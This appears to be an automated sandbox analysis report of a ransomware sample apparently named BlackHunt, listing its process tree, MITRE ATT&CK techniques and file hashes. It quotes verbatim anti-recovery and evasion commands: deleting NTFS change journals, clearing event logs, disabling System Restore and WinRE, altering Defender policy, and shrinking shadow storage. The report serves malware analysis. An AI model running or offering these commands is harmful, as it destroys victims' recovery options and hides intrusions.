C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵PID:2320
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:7464
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:3900
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:6596
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:11708
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:10112
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:8412
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f1⤵PID:3500
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f1⤵PID:5388
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f1⤵PID:6160
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB1⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:8440
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5920
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:15096
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:13124
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:6004
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\1⤵
- Enumerates connected drives
PID:8196
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup1⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:7884
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:1⤵
- Deletes NTFS Change Journal
PID:8476
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures1⤵
- Modifies boot configuration data using bcdedit
PID:10584
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt1⤵PID:7632
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:7496
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5915d9633259af9880f4fb37e748ee8d2
SHA12c82b6055b62624b2a91dcf287a62c72b74955ad
SHA256b304080bca28baca8bf6f3be00c8dc7cdcbbfe280aca4368787b5a749de29691
SHA512f12bd073a4c33d0d8f5e0520d6a61dd44e6f99033e55f6f0bef3a8ea7b04e1ea4f915400d2eb39ea6b16d93fb564553a8310541513e74f87587a4ce868ddd997
-
Filesize
12KB
MD5bc1c0739fcf5fd3a0ca9b26b324bdcf4
SHA195c5cb93bb69d95bd2b5ce91640705a1daae5d1d
SHA2569710d50db77c61beaf01eb3429716c66f36fde0fd541d8a8b88b69c298af8bd6
SHA512f7eb1cff9042375df46354506fcd2969936bb65fcc260d9fd84805c960fcd31457197079564f03744722b38c79572d6393691caaf577abee0d44a682b9d1fa96
-
Filesize
684B
MD5955df54d3b0c280d8d16ae371c2eeb01
SHA1e9aa97f38aa0fd3c27f7751e07f21dbaa318290c
SHA2568938e59fdd057cdf92736851e83e6b4257f1d265d49e6b2d759b90a51bb86b47
SHA512bcc0c97dddfefa15061251f8173f9917ff3bd625839516ebbc9b1a25f4a3046fddb7c8381b51d338214ea1c9a0e3e4c8636055a8894b56c97b14fae0cc519d22